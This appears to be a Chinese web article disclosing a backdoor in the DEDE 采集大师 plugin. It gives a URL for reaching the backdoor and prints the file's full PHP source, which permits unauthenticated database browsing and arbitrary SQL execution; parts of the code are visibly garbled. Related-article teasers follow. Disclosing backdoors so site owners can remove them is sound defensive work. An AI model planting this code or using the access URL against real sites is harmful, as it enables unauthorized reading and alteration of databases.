去除官方后门方法:安装好采集大师后,请立即删除 include目录下的dedesql.query.php文件,如已经安装过,有可能文件已被改名为arc.sqlquery.class.php,找到并删除即可。此文件可被利用来在无需登录验证的情况下查询网站数据库,并进行更新、删除、查询数据等操作。大家也可以自己测试一下是否如我所说,方法:
http://你的域名.com/include/dedesql.query.php.php?dopost=viewinfo
输入以上网址,即可打开后门界面。
说实话,会故意留后门的程序,最好的方法就是别用。这个后门被发现了,天知道下一个所谓的新版本还会不会冒出更多的后门来。此后门文件代码如下:
复制代码 代码如下:
<?php
require_once(dirname(__FILE__)."/../include/common.inc.php");
if(emptyempty($dopost))
{
$dopost = "";
}
if($dopost=="rename")
{
if(rename("dedesql.query.php","arc.sqlquery.class.php")){
echo "成功!";
}else{
echo "失败!";
}
exit();
}
if($dopost=="viewinfo")
{
if(emptyempty($tablename))
{
echo "没有指定表名!";
}
else
{
$dsql->SetQuery("SHOW CREATE TABLE ".$dsql->dbName.".".$tablename);
$dsql->Execute("me");
$row2 = $dsql->GetArray("me",MYSQL_BOTH);
$ctinfo = $row2[1];
echo "<xmp>".trim($ctinfo)."</xmp>";
}
exit();
}
if($dopost=="index")
{
require_once(DEDEINC."/arc.partview.class.php");
$envs = $_sys_globals = array();
$envs["aid"] = 0;
$pv = new PartView();
$row = $pv->dsql->GetOne("Select * From `#@__homepageset`");
$templet = str_replace("{style}",$cfg_df_style,$row["templet"]);
$homeFile = dirname(__FILE__)."/".$row["position"];
$homeFile = str_replace("//","/",str_replace("\\","/",$homeFile));
$fp = fopen($homeFile,"w") or die("无法更新网站主页到:$homeFile 位置");
fclose($fp);
$tpl = $cfg_basedir.$cfg_templets_dir."/".$templet;
$pv->SetTemplet($tpl);
$pv->SaveToHtml($homeFile);
$pv->Close();
echo "成功更新首页!";
exit();
}
else if($dopost=="query")
{
$sqlquery = trim(stripslashes($sqlquery));
if(eregi("drop(.*)table",$sqlquery) eregi("drop(.*)database",$sqlquery))
{
echo "<span style="font-size:10pt">删除"数据表"或"数据库"的语句不允许在这里执行。</span>";
exit();
}
if(eregi("^select ",$sqlquery))
{
$dsql->SetQuery($sqlquery);
$dsql->Execute();
if($dsql->GetTotalRow()<=0)
{
echo "运行SQL:{$sqlquery},无返回记录!";
}
else
{
echo "运行SQL:{$sqlquery},共有".$dsql->GetTotalRow()."条记录,最大返回100条!";
}
$j = 0;
while($row = $dsql->GetArray())
{
$j++;
if($j>100)
{
break;
}
echo "<hr size=1 width="100%"/>";
echo "记录:$j";
echo "<hr size=1 width="100%"/>";
foreach($row as $k=>$v)
{
echo "<font color="red">{$k}:</font>{$v}<br/>\r\n";
}
}
exit();
}
if($querytype==2)
{
$sqlquery = str_replace("\r","",$sqlquery);
$sqls = split(";[ \t]{0,}\n",$sqlquery);
$nerrCode = "";$i=0;
foreach($sqls as $q)
{
$q = trim($q);
if($q=="")
{
continue;
}
$dsql->ExecuteNoneQuery($q);
$errCode = trim($dsql->GetError());
if($errCode=="")
{
$i++;
}
else
{
$nerrCode .= "执行: <font color="blue">$q</font> 出错,错误提示:<font color="red">".$errCode."</font><br>";
}
}
echo "成功执行{$i}个SQL语句!<br><br>";
echo $nerrCode;
}
else
{
$dsql->ExecuteNoneQuery($sqlquery);
$nerrCode = trim($dsql->GetError());
echo "成功执行1个SQL语句!<br><br>";
echo $nerrCode;
}
exit();
}
if($dopost=="view")
{
;echo "<html>
<head>
<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\">
<title>SQL命令行工具</title>
<link href=\"img/base.css\" rel=\"stylesheet\" type=\"text/css\">
</head>
<body background=\"img/allbg.gif\" leftmargin=\"8\" topmargin=\"8\">
<table width="98%" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#D1DDAA">
<tr>
<td height="19" background="img/tbg.gif">
<table width="96%" border="0" cellspacing="1" cellpadding="1">
<tr>
<td width="24%"><strong>SQL命令运行器:</strong></td>
<td width="76%" align="right"> <b><a href="sys_data.php"><u>数据备份</u></a></b>
<b><a href="sys_data_revert.php"><strong><u>数据还原</u></strong></a></b>
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td height="200" bgcolor="#FFFFFF" valign="top">
<table width="100%" border="0" cellspacing="4" cellpadding="2">
<form action="" method="post" name="infoform" target="stafrm">
<input type=\"hidden\" name=\"dopost\" value=\"viewinfo\" />
<tr bgcolor="#F3FBEC">
<td width="15%" height="24" align="center">系统的表信息:</td>
<td>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td width="35%">
<select name="tablename" id="tablename" style="width:100%" size="6">
";
$dsql->SetQuery("Show Tables");
$dsql->Execute("t");
while($row = $dsql->GetArray("t",MYSQL_BOTH))
{
$dsql->SetQuery("Select count(*) From ".$row[0]);
$dsql->Execute("n");
$row2 = $dsql->GetArray("n",MYSQL_BOTH);
$dd = $row2[0];
echo " <option value="".$row[0]."">".$row[0]."(".$dd.")</option>\r\n";
}
;echo " </select>
</td>
<td width="2%"> </td>
<td width="63%" valign="bottom">
<div style="float:left;margin-right:20px;">
<input type="Submit" name="Submit1" value="优化选中表" class="coolbg np" />
<br />
<input type="Submit" name="Submit2" value="修复选中表" class="coolbg np" style="margin-top:6px;" />
<br />
<input type="Submit" name="Submit3" value="查看表结构" class="coolbg np" style="margin-top:6px;" />
</div>
<div style="float:left">
<input type="Submit" name="Submit5" value="优化全部表" class="coolbg np" />
<br />
<input type="Submit" name="Submit6" value="修复全部表" class="coolbg np" style="margin-top:6px;" />
</div>
</td>
</tr>
</table></td>
</tr>
<tr>
<td height="200" align="center">返回信息:</td>
<td>
<iframe name="stafrm" frameborder="0" id="stafrm" width="100%" height="100%"></iframe>
</td>
</tr>
</form>
<form action="" method="post" name="form1" target="stafrm">
<input type=\"hidden\" name=\"dopost\" value=\"query\">
<tr>
<td height="24" colspan="2" bgcolor="#F3FBEC"><strong>运行SQL命令行:
<input name="querytype" type="radio" class="np" value="0">
单行命令(支持简单查询)
<input name="querytype" type="radio" class="np" value="2" checked>
多行命令</strong></td>
</tr>
<tr>
<td height="118" colspan="2">
<textarea name="sqlquery" cols="60" rows="10" id="sqlquery" style="width:90%"></textarea>
</td>
</tr>
<tr>
<td height="53" align="center"> </td>
<td>
<input name="imageField" type="image" src="http://www.jb51.net/article/img/button_ok.gif" width="60" height="22" border="0" class=\"np\" />
</td>
</tr>
</form>
</table>
</td>
</tr>
</table>
</body>
</html>
";}
?>
DEDE采集大师官方留后门的删除办法
时间: 2024-07-28 21:49:27
DEDE采集大师官方留后门的删除办法的相关文章
反病毒还是留后门?卡巴斯基反病毒服务器被爆多个漏洞
本文讲的是反病毒还是留后门?卡巴斯基反病毒服务器被爆多个漏洞, 1.漏洞信息 类别:Web页面生成("跨站点脚本")[CWE-79],跨站点请求伪造[ CWE-352 ],不正确的特权管理[ CWE-269 ],路由名称不正确的中和受限目录[ CWE-22 ] 影响:代码执行,安全绕过,信息泄漏 远程利用:是 本地利用:是 CVE名称:CVE-2017-9813,CVE-2017-9810,CVE-2017-9811,CVE-2017 -9812 2.漏洞描述 卡巴斯基实验室的网站:
示威者集会 支持苹果拒绝为政府留后门
据外媒报道,在当地时间周三互联网维权组织Fight for the Future(FFTF)为支持苹果拒绝为美国政府留后门的决定,在苹果旧金山一家Apple Store外举行了一次集会. FFTF组织联合创始人Holmes Wilson长期以来密切关注苹果拒绝为政府机构开放后门的"斗争",在周二得知美国法院"要求苹果配合警方解锁加州枪击案凶手使用的iPhone手机"后,Wilson帮助组织了这次集会,一群苹果支持者挥舞着贴有电子前线基金会(EFF)"I d
揭露路由器背后黑色产业链:厂商留后门程序
[导读]上网遇到广告弹窗,网页被跳转赌博网站:QQ网银无缘无故被盗--很多人不知道,这些作恶的源头多起于家中那台小小的路由器.揭露路由器背后黑色产业链:厂商留后门程序上网遇到广告弹窗,网页被跳转赌博网站:QQ网银无缘无故被盗--很多人不知道,这些作恶的源头多起于家中那台小小的路由器.记者调查发现,TP-Link.D-Link.腾达.网件等主流路由器品牌的多款产品,均使用了存在缺陷的漏洞固件.弱密码设置,导致黑客们可以轻而易举获得管理员权限.而在路由器劫持的背后,一条聚集了黑客.第三方平台.广告主
法国反对加密服务给政府官员留后门
1月15日消息,据Engadget UK网站报道,目前有关加密服务是否应该给政府官员留有后门的辩论愈演愈烈,其中一个国家表示这并不是件好事.法国数字事务副部长阿克艾尔 勒梅尔(Axelle Lemaire)否决了一项拟议修正案,后者要求公司给 政府留有后门.勒梅尔代表法国政府发表言论称她认为后门是"错误的解决方案,""你所提议的本质上就不堪一击."勒梅尔解释道."这并不合适." 这名法国官员继续表示,如果留后门成为一种要求,个人数据将不受到保护,
库克拒绝政府:我们无法只给好人留后门
政府认为,如果加密技术强大到连警方也无法通过监听数据的方式来追捕犯罪分子,那就会变成一件坏事.尤其是近日在巴黎发生的恐怖袭击,更加坚定了政府的要求,他们需要破解加密. 苹果最近摊上大事了!美国政府此前向苹果抛出合作的橄榄枝,希望苹果能将某些被加密的用户信息向政府展示. 政府认为,如果加密技术强大到连警方也无法通过监听数据的方式来追捕犯罪分子,那就会变成一件坏事.尤其是近日在巴黎发生的恐怖袭击,更加坚定了政府的要求,他们需要破解加密.但苹果公司的 CEO 库克指出,如果苹果和其他科技公司都削弱加密
Google留后门漏洞,防止PR成为下一个alexa
前两天说到网站链接的建设,现在链接建设,真的很累,不是要alexa,就要收录,当然最多的是要Google PR值.今天来好好的说说这个PR值. 也许今天这个PR作弊的技术,在很多seo大鸟那早已经不算什么秘密.但我想还是有很多的像稻草神一样的seo小鸟,也许并不知道PR的这个漏洞,把漏洞 公布出来,是希望更多的站长朋友了解这个秘密,从而让利用这个漏洞的黑帽不再能欺骗更多的站长.所以我很希望有更多的站长,把它转载,分享.当然,还是要 要注明出处^_^. alexa更新了,就在前几天,大规模的提升了
苹果将战线拉长至英国:反对为政府留后门
和法国一样,英国很有可能会出台强制科技企业留后门的法案,到时苹果处境更不妙.苹果与FBI 在美国的案子还未解决,现在苹果又不得不在另外一个地方向政府部门宣战了.根据英国<独立报>的报道,苹果与其它大型科技企业联合向英国政府发动了一次"影响力广泛的攻击",这些科技企业认为英国议会起草的<调查权利法案>(Investigatory Powers Bill)仍然有非常巨大的漏洞,当地议员应该在它正式成为法律之前再次进行校正. 英国 据了解,与苹果一起联名上书的企业有谷
360总裁齐向东:某些公司有意留后门窃取隐私
CNET科技资讯网 3月29日 北京报道:360安全中心今日公开托管源代码,360总裁齐向东在发布会上表示:"某些公司有意留后门,窃取用户隐私." "我们是第一家在用户隐私方面愿意全面接受监督的公司."齐向东称,"用户维护自己的隐私权利,非常难,法律主张谁起诉,谁取证,这对用户比登天还难.我们把源代码托管,给用户提供维权的便捷途径,用户在保护隐私有任何疑虑都可以向信息中心提出申请,要求查验源代码." 最近,艳照门.马斌案.局长日记等事件,使得隐私
DEDE采集程序原理
摘要: DEDECMS自带的采集功能,虽然比不上其他专业的采集软件,但对比其他采集程序,在性能上还是非常不错.很多其他程序无法采集下来的网页,使用DEDECMS可以采集得到.比如58同城首页, DEDECMS自带的采集功能,虽然比不上其他专业的采集软件,但对比其他采集程序,在性能上还是非常不错.很多其他程序无法采集下来的网页,使用DEDECMS可以采集得到.比如58同城首页,使用discuz的下载函数采集过来的都是一片空白或者警告内容,但是使用dedecms的下载完全可以下载下来. DEDE采集